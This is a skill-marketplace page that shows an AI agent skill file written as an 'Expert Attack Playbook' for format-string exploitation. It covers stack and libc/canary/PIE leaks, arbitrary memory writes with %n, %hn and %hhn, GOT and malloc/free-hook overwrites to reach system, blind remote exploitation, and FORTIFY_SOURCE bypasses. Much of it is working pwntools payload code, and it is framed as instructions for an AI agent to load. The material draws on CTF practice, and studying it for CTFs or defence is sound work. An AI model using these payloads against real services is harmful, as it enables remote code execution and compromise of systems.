format-string-exploitation

>-

Skill file

Preview skill file
---
name: format-string-exploitation
description: >-
  Format string exploitation playbook. Use when printf-family functions receive user-controlled format strings, enabling arbitrary stack reads (%p/%s), arbitrary memory writes (%n/%hn/%hhn), GOT/hook overwrites, and canary/libc/PIE leaks.
---

# SKILL: Format String Exploitation — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.

## 0. RELATED ROUTING

- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — combine format string leak with stack overflow for full exploit
- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — format string is the primary canary/PIE/ASLR leak method
- [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) — convert format string write primitive to code execution targets
- [heap-exploitation](../heap-exploitation/SKILL.md) — heap address leak via format string for heap exploitation

---

## 1. VULNERABILITY IDENTIFICATION

### Vulnerable Pattern

```c
printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed
```

### Quick Test

```
Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset
```

---

## 2. READING MEMORY

### Stack Leak (%p)

| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Same as %p but explicit hex (64-bit) | Portable |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value |

### Finding Your Input Offset

```python
# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
#                                                           ↑ offset = 6 (example)
# Or automated:
for i in range(1, 30):
    io.sendline(f'AAAA%{i}$p')
    if '0x41414141' in io.recvline():
        print(f'Offset = {i}')
        break
```

### Leaking Specific Values

| Target | Method | Stack Position |
|---|---|---|
| Canary | `%N$p` where N = canary offset from format string | Typically at offset buf_size/8 + few |
| Saved RBP | `%N$p` (just above return address) | Leaks stack address → stack base |
| Return address | `%N$p` | Leaks .text address (PIE base = leak & ~0xfff - offset) |
| Libc address | `%N$p` where N points to `__libc_start_main+XX` return on stack | libc base = leak - offset |

### Reading Arbitrary Address (%s)

```
# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
payload = b'%8$sAAAA' + p64(target_addr)  # %8$s reads from offset 8 where address is
```

---

## 3. WRITING MEMORY (%n)

### Write Specifiers

| Specifier | Bytes Written | Width |
|---|---|---|
| `%n` | 4 bytes (int) | Characters printed so far |
| `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) |
| `%ln` | 8 bytes (long) | Characters printed so far |

### Arbitrary Write Technique

**Goal**: Write value `V` to address `A`.

**32-bit** (address on stack directly):
```python
# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload  = p32(target_addr)       # for low 2 bytes
payload += p32(target_addr + 2)   # for high 2 bytes
# Calculate padding for each %hn write
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
```

**64-bit** (address AFTER format string):
```python
# Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
```

### Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

```python
writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

# pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```

---

## 4. PWNTOOLS fmtstr_payload()

```python
from pwn import *

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                    # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,             # bytes already output before our input
    write_size='short'         # 'byte', 'short', or 'int'
)

# For 64-bit with addresses after format string:
# fmtstr_payload handles this automatically
```

### FmtStr Class (Interactive Exploitation)

```python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```

---

## 5. GOT OVERWRITE VIA FORMAT STRING

### Common Targets

| Overwrite | With | Trigger |
|---|---|---|
| `printf@GOT` | `system` | Next `printf(user_input)` → `system(user_input)`, send `/bin/sh` |
| `strlen@GOT` | `system` | If `strlen(user_input)` called |
| `puts@GOT` | `system` | If `puts(user_input)` called |
| `atoi@GOT` | `system` | If `atoi(user_input)` called (send `sh` as "number") |
| `__stack_chk_fail@GOT` | Controlled addr | Bypass canary check entirely |
| `exit@GOT` | `main` | Create infinite loop for multi-shot exploit |

### Hook Targets (glibc < 2.34)

| Target | One-gadget | Trigger |
|---|---|---|
| `__malloc_hook` | one_gadget addr | Any `printf` with large format → internal `malloc` |
| `__free_hook` | `system` | Trigger `free("/bin/sh")` |

---

## 6. STACK POINTER CHAIN EXPLOITATION

When format string is **not directly on the stack** (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.

### Two-Stage Write

```
Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr
```

This requires finding **existing pointer chains** on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

### Finding Pointer Chains

```python
# Leak stack with %p, look for:
# 1. Stack address A at offset N that points to another stack address B
# 2. Stack address B at offset M
# Modify value at A (using %N$hn) to change where B points
# Then write through B (using %M$hn) to target
```

---

## 7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

### Methodology

| Step | Action | Purpose |
|---|---|---|
| 1 | Send `%p` × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send `AAAA%N$p` for N=1..50, find 0x41414141 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via `%N$s` with GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | `%n` to rewrite GOT entry with system address |

---

## 8. FORTIFY_SOURCE BYPASS

`FORTIFY_SOURCE` (gcc `-D_FORTIFY_SOURCE=2`) replaces `printf` with `__printf_chk` which **forbids `%N$n`** (positional writes).

### Bypass Techniques

| Method | Detail |
|---|---|
| Use `%hn` sequentially (no positional) | Print exact byte count, `%hn`, adjust, `%hn` — fragile but works |
| Stack-based exploit | If format string is on stack, use non-positional `%n` with stack position control |
| Heap overflow instead | FORTIFY doesn't protect heap — combine with heap bug |
| Return-to-printf | ROP to call unfortified `printf` (if available in binary or libc) |

---

## 9. 64-BIT CONSIDERATIONS

| Challenge | Solution |
|---|---|
| Addresses contain `\x00` (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × `%hn` (2 bytes each) or 6 × `%hhn` |
| Larger stack offset range | Input may be at offset 6+ due to 6 register args saved |
| 48-bit address space | Only bottom 48 bits of 64-bit used |

### Layout Template (64-bit)

```
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →
```

---

## 10. DECISION TREE

```
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
```

Source

Creator's repository · yaklang/hack-skills

View on GitHub

Security

Security checks in progress
Results will appear here once audits complete
What this skill can do
Reads your filesConnects to the internetRuns code on your machine
Checked by 3 independent security firms
Does it try to trick the AI?Not yet checkedPending · Gen Agent Trust Hub
Does it sneak in hidden code?Not yet checkedPending · Socket
Does it have known bugs?Not yet checkedPending · Snyk